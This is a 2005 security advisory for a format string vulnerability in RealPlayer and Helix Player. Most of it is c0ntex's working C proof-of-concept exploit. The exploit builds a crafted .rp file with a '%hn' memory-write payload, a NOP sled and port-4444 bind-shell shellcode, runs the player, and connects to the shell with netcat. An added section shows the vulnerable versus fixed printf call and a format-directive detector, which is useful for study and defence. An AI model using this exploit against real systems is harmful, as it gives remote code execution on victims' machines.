RealNetworks RealPlayer and Helix Player Format String Handling Vulnerability
Published: 2005-09-27
Updated: 2005-09-27
Affected systems:
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.4
Real Networks Helix Player for Linux 1.0.3
Real Networks Helix Player for Linux 1.0.2
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0
Real Networks RealPlayer For Unix 10.0.4
Real Networks RealPlayer For Unix 10.0.3
Description:
BUGTRAQ ID: 14945
RealPlayer and Helix Player are widely used media players that support many media formats.
RealPlayer and Helix Player contain a format string vulnerability that a remote attacker may be able to exploit to take control of the machine.
The cause is a failure to validate user input: data from a media file (for example an attribute value in a crafted .rp/imfl file, as in the proof of concept below) is passed directly as the format string to a printf-style function, so an attacker can supply conversion specifiers of their own. Specifiers such as %n then turn the formatting call into an arbitrary memory write, which leads to execution of arbitrary code with the privileges of the user running the player.
<*Source: c0ntex (c0ntex@hushmail.com)
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER   10000
#define EBPMSB   64105   /* 0xFA69: 16-bit value stored by %hn into the upper half of saved EBP */
#define HOST     "localhost"
#define NETCAT   "/bin/nc"
#define NOPS     0x90
#define STACKPOP 148     /* positional argument index used with $hn */
#define VULN     "/usr/local/RealPlayer/realplay"

/* Raw bytes followed by ".rp"; the file name is handed to realplay as argv[1] */
char filename[] = "\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[] =
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
    "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
    "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
    "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
    "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
    "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
    "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
    "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
    "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
    "\xe1\xcd\x80";

int
filegen(char *shellcode)
{
    FILE *rp;

    printf("[-] Creating file [%s]\n", filename);
    rp = fopen(filename, "w");
    if (!rp) {
        puts("[!] Could not fopen file!");
        free(shellcode);
        return EXIT_FAILURE;
    }
    printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);

    /* The image "handle" attribute expands to "%.64105u%148$hn": print EBPMSB
     * characters, then %148$hn stores that character count, truncated to 16
     * bits, through the pointer found in positional argument 148 once the
     * player passes the attribute to a printf-style function.  The "name"
     * attribute carries the NOP sled followed by the bind shellcode. */
    fprintf(rp,
            "<imfl>\n"
            "<head\n"
            "duration=\"1:33.7\"\n"
            "timeformat=\"dd:hh:mm:ss.xyz\"\n"
            "preroll=\"1:33.7\"\n"
            "bitrate=\"1337\"\n"
            "width=\"69\"\n"
            "height=\"69\"\n"
            "aspect=\"\"\n"
            "url=\"http://www.open-security.org\"/>\n"
            "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
            "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
            "</imfl>", EBPMSB, STACKPOP, shellcode);
    fclose(rp);
    free(shellcode);
    return EXIT_SUCCESS;
}

int
main(int argc, char **argv)
{
    char *shellcode = NULL;

    puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
    puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
    puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

    /* BUFFER bytes of sled + shellcode plus one byte for the terminator */
    shellcode = malloc(BUFFER + 1);
    if (!shellcode) {
        puts("[!] Could not malloc");
        return EXIT_FAILURE;
    }
    memset(shellcode, NOPS, BUFFER);
    memcpy(&shellcode[BUFFER - strlen(hellcode)], hellcode, strlen(hellcode));
    shellcode[BUFFER] = '\0';

    if (filegen(shellcode) != EXIT_SUCCESS)
        return EXIT_FAILURE;
    shellcode = NULL;   /* freed by filegen */

    puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");
    switch (fork()) {
    case -1:
        puts("[!] Could not fork off, bailing!");
        return EXIT_FAILURE;
    case 0:
        /* child: open the crafted file in the vulnerable player */
        execl(VULN, "realplay", filename, NULL);
        puts("[!] Could not execute realplayer...");
        _exit(EXIT_FAILURE);
    }

    /* parent: give the player time to parse the file and bind the port */
    puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
    sleep(10);
    execl(NETCAT, "nc", HOST, "4444", NULL);
    puts("[!] Could not connect, check the core file!");
    return EXIT_FAILURE;
}
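The block below is an added illustration written for this page; it is not RealPlayer or Helix Player source and not part of c0ntex's proof of concept. It shows the bug class the description names (a value taken from a media-file attribute used directly as a format string, beside the fixed call that passes it as a %s argument), the 16-bit write primitive behind the PoC's "%.64105u%148$hn" attribute (why EBPMSB is a value below 65536 and why "$hn" rather than "$n" is used), and a small directive counter that a content filter could run over .rp attribute values. rp_trace and the other function names are hypothetical, and hn_write_width supplies the target pointer explicitly instead of taking it from the stack, so it is safe to run.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a player's trace/log wrapper: any data that
 * reaches the fmt parameter is interpreted by vsnprintf. */
static char trace_buf[512];

static int rp_trace(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(trace_buf, sizeof trace_buf, fmt, ap);
    va_end(ap);
    return n;
}

const char *rp_trace_text(void)
{
    return trace_buf;
}

/* VULNERABLE pattern: the attribute value *is* the format string.  A name
 * such as "%.64105u%148$hn" is interpreted, reads stack slots as arguments
 * and, through %n, writes memory.  (Test input here only uses "%%".) */
int trace_image_name_vuln(const char *name)
{
    return rp_trace(name);
}

/* FIXED pattern: the attribute value is only ever a %s argument. */
int trace_image_name_safe(const char *name)
{
    return rp_trace("%s", name);
}

/* The primitive behind EBPMSB=64105 and "$hn": %n stores the number of
 * characters emitted so far, and the h modifier keeps only the low 16 bits.
 * Printing `width` characters then %hn therefore stores width mod 65536.
 * snprintf(NULL, 0, ...) counts without needing a 64 KiB buffer. */
unsigned short hn_write_width(unsigned width)
{
    short slot = 0;
    snprintf(NULL, 0, "%.*u%hn", (int)width, 0u, &slot);
    return (unsigned short)slot;
}

/* Detection helper: count conversion directives in a value that should be
 * plain data (an image name, a URL).  "%%" is a literal percent and is not
 * counted.  Anything non-zero in such a field is a strong attack indicator. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {
            p++;                            /* escaped "%%" */
            continue;
        }
        p++;
        while (*p && strchr("0123456789.$-+ #*", *p))
            p++;                            /* flags, width, precision, n$ */
        while (*p && strchr("hlLqjzt", *p))
            p++;                            /* length modifiers */
        if (*p)
            count++;                        /* the conversion character */
        else
            break;                          /* dangling '%' at end of value */
    }
    return count;
}
```

Run against the attribute the PoC generates, count_format_directives("%.64105u%148$hn") reports two directives, and hn_write_width(64105) returns 64105 while hn_write_width(70000) returns 4464: a single %hn can only place a 16-bit quantity, which is why the exploit targets the upper half of the saved frame pointer with a value that fits.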
Recommendation:
Vendor patch:
Real Networks